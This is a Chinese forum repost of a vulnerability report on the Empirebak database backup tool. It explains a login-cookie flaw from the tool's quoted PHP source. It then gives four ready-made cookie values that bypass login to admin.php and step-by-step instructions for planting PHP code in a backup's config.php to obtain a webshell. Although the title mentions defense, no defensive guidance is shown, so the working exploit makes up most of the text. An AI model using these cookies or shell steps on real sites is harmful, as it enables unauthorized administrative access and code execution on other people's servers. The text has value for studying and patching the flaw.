帝国备份王(Empirebak)万能cookie及拿shell方法与防御
转自wooyun http://www.wooyun.org/bugs/wooyun-2014-078591 <br />1.伪造cookie登录系统(其实这一步多余的,大多用户连密码都没改,都是默认的123456) <br /><br />登录成功设置4个cookie,看代码<br /><br /><div class="codeText">
<div class="codeHead"><span class="lantxt">PHP Code</span><span onclick="copyIdText('code_9132')" class="copyCodeText" style="CURSOR: pointer">复制内容到剪贴板</span></div>
<div id="code_9132">
<ol class="dp-c">
<li class="alt"><span><span class="keyword">function</span><span> login(</span><span class="vars">$lusername</span><span>,</span><span class="vars">$lpassword</span><span>,</span><span class="vars">$key</span><span>,</span><span class="vars">$lifetime</span><span>=0){ </span></span> </li>
<li><span></span><span class="keyword">global</span><span> </span><span class="vars">$set_username</span><span>,</span><span class="vars">$set_password</span><span>,</span><span class="vars">$set_loginauth</span><span>,</span><span class="vars">$set_loginkey</span><span>; </span> </li>
<li class="alt"><span></span><span class="keyword">if</span><span>(</span><span class="func">empty</span><span class="keyword">empty</span><span>(</span><span class="vars">$lusername</span><span>)||</span><span class="func">empty</span><span class="keyword">empty</span><span>(</span><span class="vars">$lpassword</span><span>)) { </span> </li>
<li><span>printerror(</span><span class="string">"EmptyLoginUser"</span><span>,</span><span class="string">"index.php"</span><span>); </span> </li>
<li class="alt"><span>} </span> </li>
<li><span></span><span class="comment">//验证码 </span><span> </span> </li>
<li class="alt"><span></span><span class="keyword">if</span><span>(!</span><span class="vars">$set_loginkey</span><span>) </span> </li>
<li><span>{ </span> </li>
<li class="alt"><span></span><span class="keyword">if</span><span>(</span><span class="vars">$key</span><span><>getcvar(</span><span class="string">'checkkey'</span><span>)||</span><span class="func">empty</span><span class="keyword">empty</span><span>(</span><span class="vars">$key</span><span>)) </span> </li>
<li><span>{ </span> </li>
<li class="alt"><span>printerror(</span><span class="string">"FailLoginKey"</span><span>,</span><span class="string">"index.php"</span><span>); </span> </li>
<li><span>} </span> </li>
<li class="alt"><span>} </span> </li>
<li><span></span><span class="keyword">if</span><span>(md5(</span><span class="vars">$lusername</span><span>)<>md5(</span><span class="vars">$set_username</span><span>)||md5(</span><span class="vars">$lpassword</span><span>)<></span><span class="vars">$set_password</span><span>) </span> </li>
<li class="alt"><span>{ </span> </li>
<li><span>printerror(</span><span class="string">"ErrorUser"</span><span>,</span><span class="string">"index.php"</span><span>); </span> </li>
<li class="alt"><span>} </span> </li>
<li><span></span><span class="comment">//认证码 </span><span> </span> </li>
<li class="alt"><span></span><span class="keyword">if</span><span>(</span><span class="vars">$set_loginauth</span><span>&</span><span class="vars">$set_loginauth</span><span>!=</span><span class="vars">$_POST</span><span>[</span><span class="string">'loginauth'</span><span>]) </span> </li>
<li><span>{ </span> </li>
<li class="alt"><span>printerror(</span><span class="string">"ErrorLoginAuth"</span><span>,</span><span class="string">"index.php"</span><span>); </span> </li>
<li><span>} </span> </li>
<li class="alt"><span></span><span class="vars">$logintime</span><span>=time(); </span> </li>
<li><span></span><span class="vars">$rnd</span><span>=make_password(12);</span><span class="comment">//生成随机字符 </span><span> </span> </li>
<li class="alt"><span></span><span class="vars">$s1</span><span>=esetcookie(</span><span class="string">"bakusername"</span><span>,</span><span class="vars">$lusername</span><span>,0); </span> </li>
<li><span></span><span class="vars">$s2</span><span>=esetcookie(</span><span class="string">"bakrnd"</span><span>,</span><span class="vars">$rnd</span><span>,0);</span><span class="comment">//随机字符 </span><span> </span> </li>
<li class="alt"><span></span><span class="vars">$s3</span><span>=esetcookie(</span><span class="string">"baklogintime"</span><span>,</span><span class="vars">$logintime</span><span>,0); </span> </li>
<li><span>Ebak_SCookieRnd(</span><span class="vars">$lusername</span><span>,</span><span class="vars">$rnd</span><span>);</span><span class="comment">// </span><span> </span> </li>
<li class="alt"><span></span><span class="keyword">if</span><span>(!</span><span class="vars">$s1</span><span>||!</span><span class="vars">$s2</span><span>) </span> </li>
<li><span>{ </span> </li>
<li class="alt"><span>printerror(</span><span class="string">"NotOpenCookie"</span><span>,</span><span class="string">"index.php"</span><span>); </span> </li>
<li><span>} </span> </li>
<li class="alt"><span>printerror(</span><span class="string">"LoginSuccess"</span><span>,</span><span class="string">"admin.php"</span><span>); </span> </li>
<li><span>} </span> </li>
</ol>
</div>
</div>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p>再看看make_password函数<br /><br /></p>
<div class="codeText">
<div class="codeHead"><span class="lantxt">PHP Code</span><span onclick="copyIdText('code_8236')" class="copyCodeText" style="CURSOR: pointer">复制内容到剪贴板</span></div>
<div id="code_8236">
<ol class="dp-c">
<li class="alt"><span><span class="keyword">function</span><span> make_password(</span><span class="vars">$pw_length</span><span>){ </span></span> </li>
<li><span></span><span class="vars">$low_ascii_bound</span><span>=50; </span> </li>
<li class="alt"><span></span><span class="vars">$upper_ascii_bound</span><span>=122; </span> </li>
<li><span></span><span class="vars">$notuse</span><span>=</span><span class="keyword">array</span><span>(58,59,60,61,62,63,64,73,79,91,92,93,94,95,96,108,111); </span> </li>
<li class="alt"><span></span><span class="keyword">while</span><span>(</span><span class="vars">$i</span><span><</span><span class="vars">$pw_length</span><span>) </span> </li>
<li><span>{ </span> </li>
<li class="alt"><span>mt_srand((double)microtime()*1000000); </span> </li>
<li><span></span><span class="vars">$randnum</span><span>=mt_rand(</span><span class="vars">$low_ascii_bound</span><span>,</span><span class="vars">$upper_ascii_bound</span><span>); </span> </li>
<li class="alt"><span></span><span class="keyword">if</span><span>(!in_array(</span><span class="vars">$randnum</span><span>,</span><span class="vars">$notuse</span><span>)) </span> </li>
<li><span>{ </span> </li>
<li class="alt"><span></span><span class="vars">$password1</span><span>=</span><span class="vars">$password1</span><span>.</span><span class="func">chr</span><span>(</span><span class="vars">$randnum</span><span>); </span> </li>
<li><span></span><span class="vars">$i</span><span>++; </span> </li>
<li class="alt"><span>} </span> </li>
<li><span>} </span> </li>
<li class="alt"><span></span><span class="keyword">return</span><span> </span><span class="vars">$password1</span><span>; </span> </li>
<li><span>} </span> </li>
</ol>
</div>
</div>
<p>这个函数只是生成随机数,再看看Ebak_SCookieRnd函数<br /><br /></p>
<div class="codeText">
<div class="codeHead"><span class="lantxt">PHP Code</span><span onclick="copyIdText('code_3838')" class="copyCodeText" style="CURSOR: pointer">复制内容到剪贴板</span></div>
<div id="code_3838">
<ol class="dp-c">
<li class="alt"><span><span class="keyword">function</span><span> Ebak_SCookieRnd(</span><span class="vars">$username</span><span>,</span><span class="vars">$rnd</span><span>){ </span></span> </li>
<li><span></span><span class="keyword">global</span><span> </span><span class="vars">$set_loginrnd</span><span>;</span><span class="comment">//$set_loginrnd为config.php里面的验证随机码 </span><span> </span> </li>
<li class="alt"><span></span><span class="vars">$ckpass</span><span>=md5(md5(</span><span class="vars">$rnd</span><span>.</span><span class="vars">$set_loginrnd</span><span>).</span><span class="string">'-'</span><span>.</span><span class="vars">$rnd</span><span>.</span><span class="string">'-'</span><span>.</span><span class="vars">$username</span><span>.</span><span class="string">'-'</span><span>);</span><span class="comment">//没有把密码加进去,于是漏洞产生了 </span><span> </span> </li>
<li><span>esetcookie(</span><span class="string">"loginebakckpass"</span><span>,</span><span class="vars">$ckpass</span><span>,0); </span> </li>
<li class="alt"><span>} </span> </li>
</ol>
</div>
</div>
<p>下面给出万能cookie(key:value):<br /><br /></p>
<div class="codeText">
<div class="codeHead"><span class="lantxt">XML/HTML Code</span><span onclick="copyIdText('code_1183')" class="copyCodeText" style="CURSOR: pointer">复制内容到剪贴板</span></div>
<div id="code_1183">
<ol class="dp-xml">
<li class="alt"><span><span>ebak_loginebakckpass:119770adb578053dcb383f67a81bcbc6 </span></span> </li>
<li><span>ebak_bakrnd:35y5cCnnA4Kh </span> </li>
<li class="alt"><span>ebak_bakusername:admin </span> </li>
<li><span>ebak_baklogintime:4070883661 </span> </li>
</ol>
</div>
</div>
<p>使用以上cookie即可直接访问admin.php <br /><br /><strong>2.拿shell</strong> <br /><br />后台参数设置一般都设置好了,如果不能连接数据库,可以在数据库设置里填个自己的远程数据库 <br /><br />备份数据,随便找个数据库备份, <br /><br />然后到替换目录文件内容里,选择刚才备份的数据库, <br /><br />将”$b_table=” <br /><br />替换成 <br /><br />“phpinfo(); <br /><br />$b_table=”<br /><br /><img alt="" src="https://img.jbzj.com/file_images/article/201509/20150914231931.png" /><br />这里shell的路径就是bdata/mysql_20141007221849/config.php<br /><br /><img alt="" src="https://img.jbzj.com/file_images/article/201509/20150914231932.png" /></p>
頁:
[1]